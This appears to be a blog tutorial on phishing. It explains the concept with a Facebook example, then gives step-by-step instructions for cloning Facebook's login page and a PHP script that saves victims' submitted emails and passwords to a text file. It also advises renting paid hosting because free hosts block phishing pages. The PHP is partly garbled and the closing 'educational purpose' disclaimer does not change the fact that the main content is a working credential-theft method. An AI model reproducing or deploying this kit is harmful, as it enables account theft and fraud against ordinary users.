What is Phishing?
Phishing Method is a most popular technique used for hacking
passwords and stealing sensitive information like credit cards, banking
username & passwords etc.
Phishing method aka fishing attack is a process of creating a
duplicate copy or a clone of a reputed website in the intention of
stealing user’s password or other sensitive information like
credit card details.
It is easy for anyone who is having little technical knowledge to get a
phishing page done and that is why this method is so popular.
Phishing scams prompt users to enter sensitive details at a fake
webpage (phishing page) whose look and feel are very identical to
legitimate web pages. In most cases, the only difference is
URL.
URL can also be spoofed in some cases if the legitimate website is
vulnerable. It is difficult for a commoner to identify the phishing
scams page because of its trustworthy layout.
How does phishing method work?
Hackers / Attackers target general public and send them phishing links
through email or personal message where the victim is prompted to
click on a link in the email. The user/victim will get navigated to
a Phishing page that pretends to be legit.
Common people who don’t find that phishing page suspicious are
induced to enter their sensitive information and all the information
would get sent to the hacker/attacker.
Phishing Example
Let us take Facebook as an example.
Creating a page which perfectly looks like Facebook login page but
putting it in a different URL like fakebook.com or faecbook.com or any
URL which pretends to be legit.
When a user lands on such page, he/she might think that is real
Facebook login page and asking them to provide their username and
password.
So the people who don’t find the fake login page suspicious
might enter their username, password and the password information would
be sent to the hacker/attacker who created it, simultaneously the victim
would get redirected to the original Facebook page.
Real Life Example: John is a programmer, he creates a Facebook login page with some
scripts to enable him to get the username and password information
and put it in https://www.facebouk.com/try-your-luck-tricks.
Peter is a friend of John. John sends a message to Peter “Hey Peter, I
found a way to make money online easily you should definitely take a
look at this https://www.facebouk.com/try-your-luck-tricks”.
Peter navigate to the link and see a Facebook login page. As usual,
Peter enters his username and password of Facebook. Now the
username and password of Peter are sent to John and Peter get redirected
to a money making tips
page https://www.facebouk.com/try-your-luck-tricks-tips.html.
That’s all Peter’s Facebook account is hacked.
How to create a Phishing page in minutes?
We are going to take Facebook phishing page as an example.
- Go to Facebook.com, make sure you are not logged in to Facebook.
- Press Ctrl U to view the source code.
- Copy the source code and paste it in a notepad.
- Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl F in notepad. In Facebook login page, action attribute was filled with Facebook login process URL, replace it with process.php
- You have to find name of input fields using inspect element (Ctrl Shft I in Chrome), in our case, it is email and pass
- Save this file as index.html
- Now you have to get username and password stored in a text file named phishing.txt
- Create a file named process.php using the following code.
Process.php
if(isset($_POST[’email’]) && isset($_POST[‘pass’])) { $password=file_get_contents(‘phishing.txt’); $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” ,
Password”.$_POST[‘pass’].”\n”); fclose($file); echo ‘
’; } else echo ‘
’; ?>
How to host phishing page in a URL?
To put phishing page in a URL, you need to have two things.
- Domain
- Web Hosting
Get a Free Domain
You can create a lifetime free domain at Bluehost if you pay
for their hosting plans. Once you create a domain, you need to get
hosting and setup name servers for it. If you select Bluehost you don’t
need to setup nameservers since it will already be set.
Get Web Hosting
Almost all free hosting panels would block phishing pages. So you need
to get any paid shared hosting package, it would cost around $4 USD per
month. I prefer Bluehost for their excellent service and performance.
You can also read how to create a website in Bluehost if you
are new to domain and hosting.
NOTE: THIS POST IS JUST FOR EDUCATIONAL PURPOSE. I WOULD NOT BE
RESPONSIBLE FOR ANY DAMAGE.
TRY AT YOUR OWN RISK
